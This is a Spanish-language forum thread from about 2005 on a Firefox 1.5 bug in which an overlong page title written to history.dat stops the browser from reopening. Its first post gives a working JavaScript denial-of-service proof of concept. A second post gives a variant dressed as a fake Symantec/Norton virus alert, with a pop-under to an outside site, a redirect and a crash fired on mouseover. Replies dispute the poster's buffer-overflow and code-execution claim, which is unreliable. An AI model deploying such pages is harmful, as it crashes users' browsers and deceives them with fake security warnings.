Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.
 Autor
|
Tema: Firefox 1.5 buffer overflow! (Leído 2,187 veces)
|
mousehack
 Desconectado
Mensajes: 1.142
Ex-Colaborador....!!!!!!XD
|
Básicamente firefox logea todos los datos de una URL en el archivo de historia.dat, este pequeño script pondrá una data realmente grande y Firefox entonces salvará esa data en historia.dat. La próxima vez que el firefox se abre,se ¨colgara¨ instantáneamente debido a un buffer overflow -- esto sucederá repetidamente, hasta que ustedes borren manualmente el archivo de historia.dat Esta prueba del concepto solo impide que alguien pueda volver a abrir su browser despues de ejecutar el exploit. En concreto se trataria de Denial Of Service, sin embargo es posible la ejecucion de codigo con algunas modificaciones. Prueba de Concepto: <html><head><title>Hola Elhacker.net</title><script type="text/javascript"> function ex() { var buffer = ""; for (var i = 0; i < 5000; i++) { buffer += "A"; } var buffer2 = buffer; for (i = 0; i < 500; i++) { buffer2 += buffer; } document.title = buffer2; } </script></head><body>Mousehack dice <a href="javascript:ex();">CLICK AQUI </a></body></html> Para probar si sos vulnerable: http://mousehack.noads.info/Fire15.htmlTraducido y adaptado de www.securitytracker.comSalu2 boys PD:no se olviden de visitar mi humilde blog: http://mousehack.blogspot.com/ ...XD...Sorry por el Spam el-brujo |
|
|
|
|
En línea
|
|
|
|
mousehack
Desconectado
Mensajes: 1.142
Ex-Colaborador....!!!!!!XD
|
a ver que les parece esta variante utilizando este codigo: http://mousehack.noads.info/Fire15X.htmlcuando les aparezca la pagina, es mas divertido si tienen el bloqueador de pop-ups desactivado, o permitan que se ejecuten en esa pagina Salu2 Boys |
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.947
Lavando Platos
|
jaja, muy padre  pero el codigo que dices es codigo HTML.javascript, o te refieres a remote code execution? el firefox no se me trabo, pero tardo como 15 minutos en abrir xD.. Saludos |
|
|
|
|
En línea
|
|
|
|
mousehack
Desconectado
Mensajes: 1.142
Ex-Colaborador....!!!!!!XD
|
este es el codigo: <html><head><title>Firefox - Virus Alert</title> <script language="javascript"> <!-- window.open('http://ciberia.ya.com/webmousehack/test.html','','width=700,height=400,left=200,top=200').blur(); window.focus(); --> </script> <script type="text/javascript"> function ex() { var buffer = ""; for (var i = 0; i < 10000; i++) { buffer += "A"; } var buffer2 = buffer; for (i = 0; i < 1000; i++) { buffer2 += buffer; } document.title = buffer2; } </script></head><body onload=setTimeout("location.href='http://mousehack.noads.info'",10000) bgcolor="#000000" align=center><font color="yellow" size="+2"><img src="http://www.symantec.com/img/logos/logo-nav.en-us.gif"><br><br>Su maquina a sido infectada con el virus Sober.X.<br>Por Favor consulte con Norton Antivirus para removerlo<br><a href="javascript:ex();" onmouseover="javascript:ex();">Norton AV - Limpiar Ahora </font> </a> </body></html> simplemente e modificado los contadores y agregado algo mas de codigo. por ejemplo. si yo coloco este link en el codigo: http://ciberia.ya.com/webmousehack/test.htmlsi tienes el outlook express como mail por defecto en tu sistema windows te abrira una ventana usando por ejemplo este codigo: <META HTTP-EQUIV="refresh" CONTENT="0;url=mailto:mousehack@fbi.com?subject=Importante&body=Si puedes ver esto chequea este enlace!!! http%3a%2f%2fwww.elhacker.net/">
I'm sorry.<BR><BR> despues posteo mas ejemplos... Salu2 Boys |
|
|
|
|
En línea
|
|
|
|
swaze
Desconectado
Mensajes: 7
Si juegas con el mejor, cae como los demas.
|
Hola, hace ya dias que os leo (basicamente esta sección) y este ultimo ejemplo me parece realmente interesante, lo unico tengo una duda, se supone que este bugffer overflow es solo del firefox 1.5 y que no afecta a la version anterior verdad?
saludos
swaze
|
|
|
|
|
En línea
|
swaze
|
|
|
Ivanchuk
Desconectado
Mensajes: 466
LLVM
|
Me parece que hoy debo estar de mal humor  . Primero, el error fue reportado como DoS, no como BoF. Segundo <META HTTP-EQUIV="refresh" CONTENT="0;url=mailto:mousehack@fbi.com?subject=Importante&body=Si puedes ver esto chequea este enlace!!! http%3a%2f%2fwww.elhacker.net/">
I'm sorry.<BR><BR> Y eso??. Movelo al foro de WebMasters, lindo truco. el firefox no se me trabo, pero tardo como 15 minutos en abrir xD.. Seguro que va a tardar si tiene que generar una cadena para el titulo demasiado larga. En fin, cuando te salte un cartelito sobre error de proteccion de memoria avisa, que se puede hacer algo como la gente. |
|
|
|
« Última modificación: 8 Diciembre 2005, 22:32 por Ivanchuk »
|
En línea
|
|
|
|
Support
Desconectado
Mensajes: 29
|
el advisory original es ¨Buffer overflow¨ y asi lo tomaron las paginas de seguridad como securityfocus, milworm,packetStorm, etc
Feliz Vida!
|
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.947
Lavando Platos
|
Si creo que han entendido mal este bug..
si fuera verdad el BoF nunca se hubiera abierto el firefox.. asi que obvio no lo es.. es como decir que un alert de un string superior a los 10000 caracteres es un overflow, pero hace falta una llamada a esa direccion de memoria...
En fin, YO opino que este foro deberia UNICAMENTE colocar 0days, y bugs descubiertos por usuarios del foro, en fin..
Saludos!
|
|
|
|
|
En línea
|
|
|
|
Support
Desconectado
Mensajes: 29
|
se quedaria sin visitas entonces, porque en el tiempo que llevo visitandolos, y desde que estoy registrado, salvo el de anelkaos y uno o dos de mousehack, no vi bugs reportados por otros usuarios  Feliz Vida! |
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.947
Lavando Platos
|
dije tambien 0days, y yo he publicado algunos, es solo que ultimamente ya me aburri de tantos post ='es
esque esto cadavez se esta convirtiendo en un copy-paste de lo mas grande, y no soy solo yo el que piensa asi.. hay algun post especificamente hablando sobre esto.
de hecho, si logramos hacer esto, y si apoyamos el proyecto de Isirius, de un taller de Bugs, se podria llevar mas lejos este foro..
Saludos!
|
|
|
|
« Última modificación: 10 Diciembre 2005, 01:15 por Sirdarckcat »
|
En línea
|
|
|
|
|
dxr
|
No hay mas que pillar el ollydbg abrir el firefox y mirar si ese dos puede ser un b0f  yo no lo hare xq no me interesa este bug, pero si alguno esta interesado ya sabe... |
|
|
|
|
En línea
|
Hacer preguntas concretas, claras y aportando toda la documentación necesaria.
De lo contrario, no tendreis una respuesta clara. |
|
|
NostraTerranius
Desconectado
Mensajes: 48
|
Tened en cuenta que muchos programas comerciales tienen rutinas de tratamiento de excepciones, que evitan que "salga" a la luz que ha ocurrido un BoF. Es decir: Se produce el BoF -> el programa tiene su propio sistema de excepciones -> el sistema de excepciones "arregla" el problema (como sea, no voy a entrar en eso) y el usuario no se entera de nada Se produce el BoF -> el programa tiene excepciones -> el sistema de excepciones no lo arregla -> el programa pasa el control al sistema de excepciones de Windows y lo arregla por la fuerza (avisando de un error bla bla y cerrando el programa) Se produce el BoF -> el programa no tiene sistema de excepciones -> lo mismo que el anterior caso. Los Exception Handlers son un tema muy muy complejo e interesante... creo que Rojodos escribio una vez al respecto, deberiais echarle un vistazo... pueden ser una proteccion para el programa, o un metodo rapido para ganar el control del sistema A todo esto, que se me va la mano, si no se produce un desbordamiento en si, si no que simplemente el firefox le "cuesta" encontrar espacio para almacenar todo eso y por eso parece que esta "petado", no hay BOF, sino un momentaneo DoS. |
|
|
|
|
En línea
|
|
|
|
Ivanchuk
Desconectado
Mensajes: 466
LLVM
|
Es lo que decia. Para mi no hay BoF. Lo he probado y lo que sucede es un DoS. Es decir, despues de abrir el html con el codigo malicioso cerré firefox y luego no pude iniciarlo de vuelta, se colgaba.
|
|
|
|
|
En línea
|
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
|
Problema Con Buffer Overflow
Bugs y Exploits
|
Blackhawk222
|
10
|
1,093
|
15 Enero 2011, 08:27
por Blackhawk222
|
|
|
|
una duda acerca del buffer overflow.
Bugs y Exploits
|
black_flowers
|
10
|
1,500
|
7 Abril 2011, 17:29
por black_flowers
|
|
|
|
Dudas con Buffer Overflow...
Bugs y Exploits
|
RocKHounD
|
14
|
2,028
|
9 Noviembre 2011, 21:23
por RocKHounD
|
|
|
|
> [Linux] Técnicas de exploiting por buffer overflow : Sagrini 2012
Bugs y Exploits
|
Sagrini
|
8
|
955
|
27 Febrero 2012, 19:37
por m0rf
|
|
|
|
Necesito ayuda urgente, buffer overflow.
Bugs y Exploits
|
RocKHounD
|
8
|
1,393
|
13 Abril 2012, 19:59
por berz3k
|
 |
